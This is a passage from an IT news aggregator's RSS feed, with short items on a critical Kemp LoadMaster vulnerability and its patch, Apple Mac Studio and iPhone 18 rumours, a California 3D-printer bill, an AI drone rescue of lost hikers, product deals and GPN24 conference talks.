This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-56809">CVE-2026-56809</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Progress Kemp LoadMaster Flaw Could Let Attackers Run Root Commands Pre-Auth]]></title>
<description><![CDATA[A critical vulnerability in Progress Kemp LoadMaster can let an unauthenticated attacker execute arbitrary commands as root on the appliance by sending a crafted request to its API. The flaw, tracked as CVE-2026-8037, carries a CVSS score of 9.8 according to ZDI.…
Read more →
The post Progress Ke...]]></description>
<link>https://tsecurity.de/de/3635076/it-security-nachrichten/progress-kemp-loadmaster-flaw-could-let-attackers-run-root-commands-pre-auth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635076/it-security-nachrichten/progress-kemp-loadmaster-flaw-could-let-attackers-run-root-commands-pre-auth/</guid>
<pubDate>Tue, 30 Jun 2026 11:37:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical vulnerability in Progress Kemp LoadMaster can let an unauthenticated attacker execute arbitrary commands as root on the appliance by sending a crafted request to its API. The flaw, tracked as CVE-2026-8037, carries a CVSS score of 9.8 according to ZDI.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/progress-kemp-loadmaster-flaw-could-let-attackers-run-root-commands-pre-auth/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/progress-kemp-loadmaster-flaw-could-let-attackers-run-root-commands-pre-auth/">Progress Kemp LoadMaster Flaw Could Let Attackers Run Root Commands Pre-Auth</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Progress Kemp LoadMaster Flaw Could Let Attackers Run Root Commands Pre-Auth]]></title>
<description><![CDATA[A critical vulnerability in Progress Kemp LoadMaster can let an unauthenticated attacker execute arbitrary commands as root on the appliance by sending a crafted request to its API.

The flaw, tracked as CVE-2026-8037, carries a CVSS score of 9.8 according to ZDI. A patch is available. If you run...]]></description>
<link>https://tsecurity.de/de/3635048/it-security-nachrichten/progress-kemp-loadmaster-flaw-could-let-attackers-run-root-commands-pre-auth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635048/it-security-nachrichten/progress-kemp-loadmaster-flaw-could-let-attackers-run-root-commands-pre-auth/</guid>
<pubDate>Tue, 30 Jun 2026 11:23:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A critical vulnerability in Progress Kemp LoadMaster can let an unauthenticated attacker execute arbitrary commands as root on the appliance by sending a crafted request to its API.

The flaw, tracked as CVE-2026-8037, carries a CVSS score of 9.8 according to ZDI. A patch is available. If you run LoadMaster with the API enabled, update now.

Progress published its advisory on June]]></content:encoded>
</item>
<item>
<title><![CDATA[xTool's New Printer Is Going to Make It Easier Than Ever to Be Creative and the Preorder Is Live Today]]></title>
<description><![CDATA[The O1 Omni printer is an all-in-one desktop printer capable of printing on “virtually any material.” Preorders are now live and include special perks.]]></description>
<link>https://tsecurity.de/de/3632999/it-nachrichten/xtools-new-printer-is-going-to-make-it-easier-than-ever-to-be-creative-and-the-preorder-is-live-today/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632999/it-nachrichten/xtools-new-printer-is-going-to-make-it-easier-than-ever-to-be-creative-and-the-preorder-is-live-today/</guid>
<pubDate>Mon, 29 Jun 2026 15:17:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The O1 Omni printer is an all-in-one desktop printer capable of printing on “virtually any material.” Preorders are now live and include special perks.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple M5 Ultra Mac Studio Will Get Better Cooling For AI Tasks]]></title>
<description><![CDATA[Apple is getting ready to launch a new Mac Studio later this year, and it is bringing some major internal upgrades to handle heavy artificial intelligence tasks. According to a recent report, the upcoming desktop will feature the powerful M5 Ultra chip and an improved heat sink. As local AI model...]]></description>
<link>https://tsecurity.de/de/3632418/ios-mac-os/apple-m5-ultra-mac-studio-will-get-better-cooling-for-ai-tasks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3632418/ios-mac-os/apple-m5-ultra-mac-studio-will-get-better-cooling-for-ai-tasks/</guid>
<pubDate>Mon, 29 Jun 2026 11:11:04 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is getting ready to launch a new Mac Studio later this year, and it is bringing some major internal upgrades to handle heavy artificial intelligence tasks. According to a recent report, the upcoming desktop will feature the powerful M5 Ultra chip and an improved heat sink. As local AI models become more demanding, the company wants to make sure its hardware stays cool under sustained pressure.



Better cooling handles heavy workloads while the exterior stays identical



The upcoming M5 Ultra chip packs a lot of power. The company is testing versions with up to 36 CPU cores, 80 GPU cores, and a massive 768GB of unified memory. These specs make the new Mac ideal for developers running complex coding agents or creators managing high-end video production. Since sustained tasks generate a lot of heat, the upgraded thermal system will help keep the machine running smoothly without dropping performance.



While the inside is getting a massive boost, you will not see any changes on the outside. The tech giant tends to stick with the same desktop chassis for a long time. For example, a new iPhone might get fresh colors and shapes, but desktop machines stay consistent. The current Mac Studio design will remain intact for this release.



Looking further down the road, recent reports suggest that the company will likely skip the M6 generation entirely for its professional desktops. Instead, it plans to introduce an M7 Ultra version around 2028.



For now, the updated Mac Studio arrives right as demand for headless computers is going up. Because of the ongoing memory shortage, the company recently bumped the starting price of the current model to $2,499. The upcoming M5 Ultra version remains on track for a release later this year. This gives power users a much-needed thermal upgrade to look forward to, even as the broader hardware market faces rising costs.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Reportedly Preparing M5 Mac Studio for 2026, M7 Upgrade to Follow in 2028]]></title>
<description><![CDATA[Apple still plans to launch a refreshed Mac Studio later this year with new M5 Max and M5 Ultra chips, giving professional users a long-awaited hardware update after the current model shipped with the M4 Max and older M3 Ultra configuration. 



While buyers should not expect a new design, the up...]]></description>
<link>https://tsecurity.de/de/3631359/ios-mac-os/apple-reportedly-preparing-m5-mac-studio-for-2026-m7-upgrade-to-follow-in-2028/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631359/ios-mac-os/apple-reportedly-preparing-m5-mac-studio-for-2026-m7-upgrade-to-follow-in-2028/</guid>
<pubDate>Sun, 28 Jun 2026 19:44:21 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple still plans to launch a refreshed Mac Studio later this year with new M5 Max and M5 Ultra chips, giving professional users a long-awaited hardware update after the current model shipped with the M4 Max and older M3 Ultra configuration. 



While buyers should not expect a new design, the upcoming refresh will deliver newer Apple silicon before the company turns its attention to more meaningful changes planned for 2028.



According to Bloomberg's Mark Gurman, Apple remains on schedule to release the M5 Mac Studio this year despite earlier reports that pointed to a much earlier launch. The update focuses on faster chips instead of external changes, making it a straightforward performance upgrade for users who need more processing power.



Bigger Mac Studio Changes Planned for 2028



Gurman also shared details about Apple's longer-term roadmap, saying the company already has an M7 Ultra Mac Studio in development with internal improvements aimed at handling increasingly demanding AI workloads.




"There are two Mac Studio updates in Apple’s pipeline: an M5 Ultra version due this year and an M7 Ultra update targeted for 2028. I’m told Apple has also been working on internal changes to the high-powered desktop, including a better heat sink to improve thermal performance as the machine takes on more demanding on-device AI workloads."




Mark Gurman also said Apple is not planning a major redesign for the M5 Mac Studio, although the company continues to evaluate future hardware changes. He added that Apple typically keeps desktop designs in the lineup for many years, making a significant redesign more likely with a later generation.



The report also states that Apple intends to skip high-end M6 Pro, M6 Max, and M6 Ultra chips, with the Mac Studio roadmap moving from the M5 family to the M7 generation. For buyers who need a Mac Studio soon, the M5 model remains the next upgrade to watch, while users willing to wait several years may see broader internal improvements with the M7 version.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kalifornien: AB 2047 will 3D-Printer überwachen – Open-Source droht abgewürgt zu werden]]></title>
<description><![CDATA[KALIFORNIEN / LONDON (IT BOLTWISE) – Kaliforniens Gesetzgeber treiben trotz Protesten eine Pflicht zur Überwachung von 3D-Druckern voran. Die Novelle zu AB 2047 lockert zwar einzelne Punkte, lässt aber die Kernrisiken für Privatsphäre, Rede- und Verbraucherrechte bestehen. Besonders problematisch...]]></description>
<link>https://tsecurity.de/de/3631078/it-security-nachrichten/kalifornien-ab-2047-will-3d-printer-ueberwachen-open-source-droht-abgewuergt-zu-werden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631078/it-security-nachrichten/kalifornien-ab-2047-will-3d-printer-ueberwachen-open-source-droht-abgewuergt-zu-werden/</guid>
<pubDate>Sun, 28 Jun 2026 15:08:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-3d-printer-surveillance-california.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-3d-printer-surveillance-california.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-3d-printer-surveillance-california-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-3d-printer-surveillance-california-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-3d-printer-surveillance-california-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-3d-printer-surveillance-california-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-3d-printer-surveillance-california-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">KALIFORNIEN / LONDON (IT BOLTWISE) – Kaliforniens Gesetzgeber treiben trotz Protesten eine Pflicht zur Überwachung von 3D-Druckern voran. Die Novelle zu AB 2047 lockert zwar einzelne Punkte, lässt aber die Kernrisiken für Privatsphäre, Rede- und Verbraucherrechte bestehen. Besonders problematisch: Das Gesetz knüpft an Algorithmus-Standards an, die Umgehung nicht zuverlässig verhindern, aber legitime Nutzung blockieren und […]</p>
<div><a href="https://www.it-boltwise.de/kalifornien-ab-2047-will-3d-printer-ueberwachen-open-source-droht-abgewuergt-zu-werden.html">... den vollständigen Artikel <strong>»Kalifornien: AB 2047 will 3D-Printer überwachen – Open-Source droht abgewürgt zu werden«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/kalifornien-ab-2047-will-3d-printer-ueberwachen-open-source-droht-abgewuergt-zu-werden.html">Kalifornien: AB 2047 will 3D-Printer überwachen – Open-Source droht abgewürgt zu werden</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thermal cameras can spot problems you can't see - what I've learned after years of testing]]></title>
<description><![CDATA[Thermal cameras have saved me thousands over the years. Just the other day, one simple check saved me $1,000.]]></description>
<link>https://tsecurity.de/de/3631047/it-security-nachrichten/thermal-cameras-can-spot-problems-you-cant-see-what-ive-learned-after-years-of-testing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631047/it-security-nachrichten/thermal-cameras-can-spot-problems-you-cant-see-what-ive-learned-after-years-of-testing/</guid>
<pubDate>Sun, 28 Jun 2026 14:37:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Thermal cameras have saved me thousands over the years. Just the other day, one simple check saved me $1,000.]]></content:encoded>
</item>
<item>
<title><![CDATA[Australian rescue team uses AI-powered drone to find lost hikers – video]]></title>
<description><![CDATA[Two men in their 20s were found within five hours thanks to an artificial intelligence-powered drone, which used thermal imaging to locate them. Two hikers veered off a walking track in Kosciuszko national park, New South Wales, on Tuesday, and were found about half a kilometre off the track. It ...]]></description>
<link>https://tsecurity.de/de/3629386/it-nachrichten/australian-rescue-team-uses-ai-powered-drone-to-find-lost-hikers-video/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629386/it-nachrichten/australian-rescue-team-uses-ai-powered-drone-to-find-lost-hikers-video/</guid>
<pubDate>Sat, 27 Jun 2026 12:21:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two men in their 20s were found within five hours thanks to an artificial intelligence-powered drone, which used thermal imaging to locate them. Two hikers veered off a walking track in Kosciuszko national park, New South Wales, on Tuesday, and were found about half a kilometre off the track. It was the first time the FRNSW drone’s AI detection system had been used to rescue missing people</p><ul><li><p><a href="https://www.theguardian.com/australia-news/2026/jun/27/ai-drone-rescue-kosciuszko-national-park-hikers-fire-rescue-nsw">Hikers lost in Kosciuszko national park rescued within five hours by AI drone</a></p></li></ul> <a href="https://www.theguardian.com/australia-news/video/2026/jun/27/australian-rescue-team-uses-ai-powered-drone-to-find-lost-hikers-video">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hikers lost in Kosciuszko national park rescued within five hours by AI drone]]></title>
<description><![CDATA[Fire and Rescue NSW uses thermal imaging and a mobile phone red light to quickly locate men who veered off walking track near JindabyneGet our breaking news email, free app or daily news podcastTwo hikers who veered off a walking track in Kosciuszko national park have been found within five hours...]]></description>
<link>https://tsecurity.de/de/3628909/it-nachrichten/hikers-lost-in-kosciuszko-national-park-rescued-within-five-hours-by-ai-drone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628909/it-nachrichten/hikers-lost-in-kosciuszko-national-park-rescued-within-five-hours-by-ai-drone/</guid>
<pubDate>Sat, 27 Jun 2026 05:18:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fire and Rescue NSW uses thermal imaging and a mobile phone red light to quickly locate men who veered off walking track near Jindabyne</p><ul><li><p>Get our <a href="https://www.theguardian.com/email-newsletters?CMP=cvau_sfl">breaking news email</a>, <a href="https://app.adjust.com/w4u7jx3">free app</a> or <a href="https://www.theguardian.com/australia-news/series/full-story?CMP=cvau_sfl">daily news podcast</a></p></li></ul><p>Two hikers who veered off a walking track in Kosciuszko national park have been found within five hours using a drone powered by artificial intelligence, a first-of-its-kind mission, Fire and Rescue NSW (FRNSW) has said.</p><p>The two men, aged in their 20s, were reported missing at 7pm on Tuesday evening after they failed to return to a rendezvous point on time.</p> <a href="https://www.theguardian.com/australia-news/2026/jun/27/ai-drone-rescue-kosciuszko-national-park-hikers-fire-rescue-nsw">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bambu Lab 3D printer deals — these pro and budget 3D printers nailed our workshop tests and you won't find them in Amazon's Prime Day sale]]></title>
<description><![CDATA[We've tested all the top Bambu Lab 3D printers. These are the best prices right now (and no, they're not on Amazon).]]></description>
<link>https://tsecurity.de/de/3628554/it-nachrichten/bambu-lab-3d-printer-deals-these-pro-and-budget-3d-printers-nailed-our-workshop-tests-and-you-wont-find-them-in-amazons-prime-day-sale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628554/it-nachrichten/bambu-lab-3d-printer-deals-these-pro-and-budget-3d-printers-nailed-our-workshop-tests-and-you-wont-find-them-in-amazons-prime-day-sale/</guid>
<pubDate>Fri, 26 Jun 2026 22:48:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We've tested all the top Bambu Lab 3D printers. These are the best prices right now (and no, they're not on Amazon).]]></content:encoded>
</item>
<item>
<title><![CDATA[Should You Buy Your Kid a 3D Printer? What to Know and Consider (2026)]]></title>
<description><![CDATA[Kids love 3D printers almost as much as K-Pop Demon Hunters. Just give in and get one.]]></description>
<link>https://tsecurity.de/de/3627084/it-nachrichten/should-you-buy-your-kid-a-3d-printer-what-to-know-and-consider-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627084/it-nachrichten/should-you-buy-your-kid-a-3d-printer-what-to-know-and-consider-2026/</guid>
<pubDate>Fri, 26 Jun 2026 12:47:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kids love 3D printers almost as much as K-Pop Demon Hunters. Just give in and get one.]]></content:encoded>
</item>
<item>
<title><![CDATA['Skip the Dyson, get this instead': As a vacuum reviewer, this is the EOFY handstick deal I'd buy myself]]></title>
<description><![CDATA[The Dreame Z50 Station isn't sold at other retailers, so it's a good thing the appliance brand is discounting this powerful stick vacuum to AU$999.]]></description>
<link>https://tsecurity.de/de/3626097/it-nachrichten/skip-the-dyson-get-this-instead-as-a-vacuum-reviewer-this-is-the-eofy-handstick-deal-id-buy-myself/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626097/it-nachrichten/skip-the-dyson-get-this-instead-as-a-vacuum-reviewer-this-is-the-eofy-handstick-deal-id-buy-myself/</guid>
<pubDate>Fri, 26 Jun 2026 02:32:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Dreame Z50 Station isn't sold at other retailers, so it's a good thing the appliance brand is discounting this powerful stick vacuum to AU$999.]]></content:encoded>
</item>
<item>
<title><![CDATA[Our top-rated shipping label printer hits its lowest ever price for Prime Day — and the Munbyn RW403B is genuinely the best we’ve ever tested]]></title>
<description><![CDATA[Our senior printer editor called it "quick, quiet, and actually fun to use."]]></description>
<link>https://tsecurity.de/de/3622988/it-nachrichten/our-top-rated-shipping-label-printer-hits-its-lowest-ever-price-for-prime-day-and-the-munbyn-rw403b-is-genuinely-the-best-weve-ever-tested/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622988/it-nachrichten/our-top-rated-shipping-label-printer-hits-its-lowest-ever-price-for-prime-day-and-the-munbyn-rw403b-is-genuinely-the-best-weve-ever-tested/</guid>
<pubDate>Thu, 25 Jun 2026 00:47:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Our senior printer editor called it "quick, quiet, and actually fun to use."]]></content:encoded>
</item>
<item>
<title><![CDATA[Ok - for the last and final time: Patents are good. And Patents are bad. A 3D printer project to prove it. (gpn24)]]></title>
<description><![CDATA[One last time: Patents are good. And Patents are bad.
And using the example of an ancient commercial 3D printer, we can finally prove it.

After getting hold of a defective 15 year old 3D printer, manufactured by the inventor of filament based 3D printing, we knew right away that we were not goin...]]></description>
<link>https://tsecurity.de/de/3622535/it-security-video/ok-for-the-last-and-final-time-patents-are-good-and-patents-are-bad-a-3d-printer-project-to-prove-it-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622535/it-security-video/ok-for-the-last-and-final-time-patents-are-good-and-patents-are-bad-a-3d-printer-project-to-prove-it-gpn24/</guid>
<pubDate>Wed, 24 Jun 2026 20:49:48 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[One last time: Patents are good. And Patents are bad.
And using the example of an ancient commercial 3D printer, we can finally prove it.

After getting hold of a defective 15 year old 3D printer, manufactured by the inventor of filament based 3D printing, we knew right away that we were not going to bring it back to its original working state. 

The reason is simple: the control board made sure that the printer would only accept filament from the manufacturer. A little chip inside the cartridges in which the filament can be obtained, made sure you would not by accident fill the cartridge with an unworthy material that might end you up in a bad printing experience. The only worthy filament is priced at around 10 times the price of regular (so called!) premium filament on the market. Which again was the only reason the manufacturer was able to sell the very solid machine at a laughable 40.000 € back in 2009.

So, we decided to replace all of the electronics. And the print head. And while we were at it, the print bed had to go too. And the bed leveling sensor.
We ended up with a printer that has current 3D printing features like: Klipper firmware, BL Touch, a heated print bed, an integrated OBC and an 8&quot; touch display.

But why was this possible at all (and how can we get back on topic from this point of the story)? Well - easy! Being the inventor of the technology the manufacturer had their inventions patented. Which does not only result in the - obvious - protection of their IP but also means that there is plenty of detailed documentation available that allowed someone some 20 years later to start an open source project that basically gave birth to the &quot;prime father&quot; of all modern filament based 3D printers we know today: the RepRap printer.

Most of the components we used to upgrade the ancient printer only exist because they were, in the first place: patented (boo!), documented, and then rebuilt and published (yay!) as open source hardware.

Therefore patents were the tool to give the inventor a chance to make money from its invention for years and thus refinancing the development of the technology. And those same patents made the open source project possible, giving all of us high-tech affordable 3D printing!

The talk will mainly focus on the changes we made to the printer to bring it to current technology in terms of hardware and software. It will also discuss the role the patents play in this whole picture and draw a beautiful circle from the original printer to all of the printers we know today.
If all goes well we might even bring the printer to the GPN. The distance won't be the problem - it's more the weight which is around 128 kg...

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/XSQCPR/]]></content:encoded>
</item>
<item>
<title><![CDATA[De-Spotify Yourself - Warum Du von $Streamingdienst weg willst und wie/wohin (gpn24)]]></title>
<description><![CDATA[In diesem Talk behandeln wir Gründe von verschiedenen Musik- und Podcast-Streamingdiensten wegzumigrieren und schauen uns mögliche automatische Unterstützung und Alternativen (am Beispiel Spotify) an.

Im Rahmen meiner Großoffensive mich unabhängig(er) von Big Tech zu machen, musste zuletzt Spoti...]]></description>
<link>https://tsecurity.de/de/3622502/it-security-video/de-spotify-yourself-warum-du-von-streamingdienst-weg-willst-und-wiewohin-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622502/it-security-video/de-spotify-yourself-warum-du-von-streamingdienst-weg-willst-und-wiewohin-gpn24/</guid>
<pubDate>Wed, 24 Jun 2026 20:49:06 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In diesem Talk behandeln wir Gründe von verschiedenen Musik- und Podcast-Streamingdiensten wegzumigrieren und schauen uns mögliche automatische Unterstützung und Alternativen (am Beispiel Spotify) an.

Im Rahmen meiner Großoffensive mich unabhängig(er) von Big Tech zu machen, musste zuletzt Spotify dran glauben. 

In diesem Talk erzähle ich Euch zunächst wieso (nein, es ist nicht nur Enshittyfication und Big-Tech böse).
Danach schauen wir uns an welche Alternativen es selfhosted gibt, wie gut ich sie finde, und welche ich jetzt benutze.

Außerdem gibt es einen Git-Link zu den Scripten, die ich dafür geschrieben habe und eine kurze Erklärung wie Ihr Eure Spotify Playlists auf mp3s, die Ihr von physischen Alben, die Ihr besitzt, gezogen habt, mappen könnt :)

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/GSHUB7/]]></content:encoded>
</item>
<item>
<title><![CDATA[I found every Prime Day 3D printer deal that scored over 4.5 stars in our workshop tests — these are the 14 I fully recommend]]></title>
<description><![CDATA[I compared prices direct from 3D print makers and the Amazon sale, and these are the best prices right now.]]></description>
<link>https://tsecurity.de/de/3621556/it-nachrichten/i-found-every-prime-day-3d-printer-deal-that-scored-over-45-stars-in-our-workshop-tests-these-are-the-14-i-fully-recommend/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621556/it-nachrichten/i-found-every-prime-day-3d-printer-deal-that-scored-over-45-stars-in-our-workshop-tests-these-are-the-14-i-fully-recommend/</guid>
<pubDate>Wed, 24 Jun 2026 15:47:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I compared prices direct from 3D print makers and the Amazon sale, and these are the best prices right now.]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone 18 Pro and iPhone Fold: Everything We Expect This September]]></title>
<description><![CDATA[Apple’s September 2026 iPhone event is shaping up to be one of the company’s most important launches in years, with the iPhone 18 Pro lineup expected to arrive alongside Apple’s first foldable iPhone. The regular iPhone 18 is not expected to launch at the same time, which makes this fall event mo...]]></description>
<link>https://tsecurity.de/de/3620692/ios-mac-os/iphone-18-pro-and-iphone-fold-everything-we-expect-this-september/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620692/ios-mac-os/iphone-18-pro-and-iphone-fold-everything-we-expect-this-september/</guid>
<pubDate>Wed, 24 Jun 2026 10:54:54 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple’s September 2026 iPhone event is shaping up to be one of the company’s most important launches in years, with the iPhone 18 Pro lineup expected to arrive alongside Apple’s first foldable iPhone. The regular iPhone 18 is not expected to launch at the same time, which makes this fall event more focused on premium models.



The main products expected this September are the iPhone 18 Pro, iPhone 18 Pro Max, and the first iPhone Fold. Apple has not announced the official names yet, but these are the names most reports are using right now.



The biggest change is the split iPhone release strategy. Instead of launching the full iPhone 18 family together, Apple is expected to save the lower-cost iPhone 18, iPhone 18e, and possibly the next iPhone Air for spring 2027. That means September could belong fully to Apple’s highest-end iPhones.



Expected iPhone 18 Pro and iPhone Fold Launch Date



Apple usually holds its major iPhone event in September, and the iPhone 18 Pro models are expected to follow that pattern. The iPhone Fold is also expected to be announced at the same event, though some reports suggest retail availability could come later if production is tight.



ProductExpected announcementExpected availabilityStatusiPhone 18 ProSeptember 2026September 2026ExpectediPhone 18 Pro MaxSeptember 2026September 2026ExpectediPhone FoldSeptember 2026September or laterExpectediPhone 18Spring 2027Spring 2027Expected lateriPhone 18eSpring 2027Spring 2027Expected lateriPhone Air 2Spring 2027 or laterUnclearUnconfirmed



The iPhone Fold is the device to watch because it brings Apple into a product category that Samsung, Huawei, Google, Oppo, and Honor have been building for years. Apple appears to be waiting until the hardware, hinge, display crease, battery, and software experience meet its standards.



iPhone 18 Pro: Expected Design







The iPhone 18 Pro and iPhone 18 Pro Max are expected to look similar to the iPhone 17 Pro models, with the same general body shape and a triple-camera system on the back. Apple is not expected to make a major design change on the rear, but the front could look cleaner because of a smaller Dynamic Island.



Reports suggest Apple is working on under-display Face ID components, although the selfie camera and some Face ID parts are still expected to require a visible cutout. This means the iPhone 18 Pro may not become a true all-screen iPhone yet, but the Dynamic Island could shrink enough to make the display feel more modern.



The Pro models are also expected to keep similar screen sizes. The iPhone 18 Pro Max may become slightly thicker, likely because Apple wants more space for battery, camera hardware, or thermal management.



iPhone 18 Pro: Camera Upgrades







The most important iPhone 18 Pro upgrade could be the camera system. Reports point to Apple adding a variable aperture lens to at least one Pro model, likely for the main camera.



A variable aperture lets the camera physically change how much light enters the lens. In bright light, the aperture can close down to reduce overexposure. In darker scenes, it can open wider to gather more light. It can also help control background blur in portraits and close-up shots.



Expected camera changes include:




Variable aperture main camera for better control over light and depth.



Improved image processing powered by the A20 Pro chip.



Better low-light performance through sensor and lens improvements.



More pro-level camera controls for users who shoot photos and videos manually.



Possible front camera upgrade as Apple is expected to improve selfie camera hardware across the iPhone 18 family.




Apple has pushed heavily into computational photography for years, but the iPhone 18 Pro rumors suggest a stronger focus on physical camera hardware. This matters because hardware-level improvements usually help before software processing even begins.



iPhone 18 Pro: A20 Pro Chip and Performance







The iPhone 18 Pro models are expected to use Apple’s A20 Pro chip, reportedly built on TSMC’s 2nm process. A smaller chip process usually allows better performance and efficiency because more transistors can fit into the same area.



For users, this should help with:



AreaExpected improvementSpeedFaster app launches, gaming, and video editingBattery lifeBetter efficiency from the 2nm processAI featuresMore local Apple Intelligence processingCameraFaster image processing and video captureHeat controlBetter sustained performance under load



The iPhone 18 Pro models are also expected to support more memory, with 12GB RAM widely rumored across higher-end models. More RAM helps with Apple Intelligence, multitasking, background tasks, and heavier camera processing.



iPhone Fold: Expected Design and Display







The iPhone Fold is expected to use a book-style folding design, similar to the Galaxy Z Fold series and Pixel Fold. When closed, users should get a smaller outer screen for calls, messages, quick apps, notifications, and camera use. When opened, the phone should turn into a small tablet-like device.



Expected iPhone Fold display details:



FeatureExpected detailFold styleBook-style foldOuter displayAround 5.5 inchesInner displayAround 7.8 inchesAspect ratioWider 4:3 style layoutThickness openedAround 4.5mmThickness closedAround 9mm to 9.5mmDisplay typeOLEDCreaseExpected to be minimal or nearly invisible



Apple is expected to focus heavily on reducing the crease. Foldable phones have improved a lot, but display crease visibility remains one of the biggest complaints. Reports suggest Apple is using reinforced glass layers, advanced adhesives, custom display materials, and a stronger hinge design to make the fold area less visible.



iPhone Fold: Touch ID Instead of Face ID



One of the more surprising iPhone Fold rumors is the return of Touch ID. The foldable iPhone is expected to use a side-mounted Touch ID sensor built into the power button, similar to the iPad Air and iPad mini.



The reason appears to be space. A foldable design is thin, complex, and packed with hinge parts, dual displays, cameras, and battery cells. Face ID hardware takes up internal space, so Apple is expected to use Touch ID to keep the device thinner.



This does not mean Face ID is going away from regular iPhones. The iPhone 18 Pro models are still expected to use Face ID.



iPhone Fold: Cameras, Battery, and Chip



The iPhone Fold is expected to use the A20 chip, not necessarily the A20 Pro version expected in the iPhone 18 Pro models. It is also expected to include 12GB RAM, which should help with multitasking and Apple Intelligence features on the larger display.



Reported iPhone Fold specs include:




A20 chip built on a 2nm process.



12GB RAM for multitasking and AI features.



Dual rear cameras, possibly two 48MP sensors.



Front cameras on both displays, so users can take calls whether the phone is folded or unfolded.



Battery capacity between 5,000mAh and 5,800mAh, depending on the final design.



Titanium or titanium-aluminum frame for strength without too much weight.



eSIM-only design in some markets, based on current rumors.




The larger battery makes sense because a foldable iPhone has two screens and a larger inner display. Apple will also need strong power management to keep battery life competitive with regular iPhones.



Software: Why iOS 27 Matters for the iPhone Fold



The iPhone Fold will need more than folding hardware to work well. Apple also needs iOS to adapt properly between a compact outer display and a larger inner screen.



